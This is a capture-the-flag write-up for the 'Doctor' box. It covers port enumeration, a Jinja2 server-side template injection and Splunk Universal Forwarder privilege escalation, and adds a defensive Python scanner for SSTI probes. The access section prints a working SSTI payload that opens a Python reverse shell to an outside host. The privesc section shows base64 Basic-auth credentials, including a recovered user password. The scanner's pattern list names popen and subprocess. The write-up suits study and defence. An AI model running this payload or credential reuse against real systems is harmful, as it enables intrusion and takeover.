Port Scanning and general enumeration (Nmap, FFuF)
Port 8089 is for Splunkd. Doing some research I found out that this port is for the Splunk Universal Forwarder. Let’s keep this in mind for later.
Standard enumeration of the site on port 80 doesn’t reveal anything great, but there is one interesting thing to note: doctors.htb. Let’s update our /etc/hosts file and point
New things to play with! Let’s toss ffuf at this while we poke around
ffuf -u http://doctors.htb/FUZZ -w /path/to/wordlist -c
Let’s create an account and see what this app is all about.
Testing different payloads for different exploits gave us nothing in return at first glance. But if we go back to the archive endpoint and check the source, we see something interesting.
Ah! Vulnerable to SSTI!
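From the defender’s side, the tell for this bug is a stored field (the post title) that is later pushed through the template engine. As an added example that is not part of the original writeup, here is a small scanner that rates post titles recorded in a constructed application log for Jinja2 SSTI probes; the log format, user names and titles are all assumptions made up for the example.

```python
import re
from typing import Dict, List

# Constructed sample application log (not from the box): each line records the user-supplied
# "title" of a blog post, the field the archive endpoint later renders through Jinja2.
SAMPLE_LOG = """\
2020-09-27 10:01:12 INFO post created user=alice title="Flu season tips"
2020-09-27 10:03:44 INFO post created user=bob title="{{7*7}}"
2020-09-27 10:05:02 INFO post created user=bob title="{{ x.__class__.__mro__ }}"
2020-09-27 10:06:19 INFO post created user=carol title="My {{favourite}} recipe"
2020-09-27 10:07:55 INFO post created user=dave title="{% for i in range(3) %}x{% endfor %}"
"""

# Strong indicators: attribute walks and OS/command helpers that no blog title needs.
STRONG = [r"__class__", r"__mro__", r"__subclasses__", r"__globals__", r"__builtins__",
          r"__import__", r"\bpopen\b", r"\bsubprocess\b"]
# Jinja2 expression and statement delimiters; on their own they are only weak evidence.
DELIM_RE = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)
OPERATOR_RE = re.compile(r"[*+\-/()\[\]|%.]")
TITLE_RE = re.compile(r'title="(?P<title>.*)"$')
USER_RE = re.compile(r"user=(\S+)")

def classify_title(title: str) -> str:
    """Rate one stored title: 'high', 'medium', 'low' or 'none'."""
    if any(re.search(p, title) for p in STRONG):
        return "high"
    severity = "none"
    for m in DELIM_RE.finditer(title):
        inner = m.group(1) if m.group(1) is not None else m.group(2)
        # Arithmetic, calls or indexing inside the braces is the classic {{7*7}} probe.
        if OPERATOR_RE.search(inner):
            return "medium"
        severity = "low"  # bare {{word}}: possibly innocent, still worth a glance
    return severity

def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per log line that carries a title field."""
    findings = []
    for line in text.splitlines():
        m = TITLE_RE.search(line)
        if not m:
            continue
        u = USER_RE.search(line)
        findings.append({"user": u.group(1) if u else "?", "title": m.group("title"),
                         "severity": classify_title(m.group("title"))})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        if f["severity"] != "none":
            print(f"[{f['severity']:6}] user={f['user']} title={f['title']!r}")
```

The real fix is on the application side (render user data as a template variable, never as template source), but a scan like this over stored fields or request logs shows who was probing and when.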
Access (SSTI, reverse shell)
I actually covered this in a writeup for a CTF challenge from Hacktivitycon2020 called Template Shack. This time, though, instead of using slicing to find where subprocess.Popen is, we’ll use this handy payload I found on PayloadAllTheThings.
After editing it a bit so that it makes a call back to our machine:
.builtins'import'.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh", "-i"]);'").read()
We can use that as our title, put whatever you want in the body, and make the post.
Fire up a listener on your box and reload the
Privesc (linPEAS, Spelunker)
So now we have a shell on the box. Let’s see what linPEAS says.
Interesting log file entry
Doesn’t look like an email. Maybe the shaun user’s password? Turns out that it is. Strange.
Let’s take a look at port 8089 again. As I mentioned earlier, it’s for the Splunk Universal Forwarder. There are some exploits floating around for it, including a local privilege escalation that we’re going to use.
First, we need to update the Spelunker script, because the script assumes that the creds are
This is what we need to change, from
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
to
Authorization: Basic c2hhdW46R3VpdGFyMTIz
Get the script onto the box, make it executable (chmod +x) and run it.
Follow the instructions to root!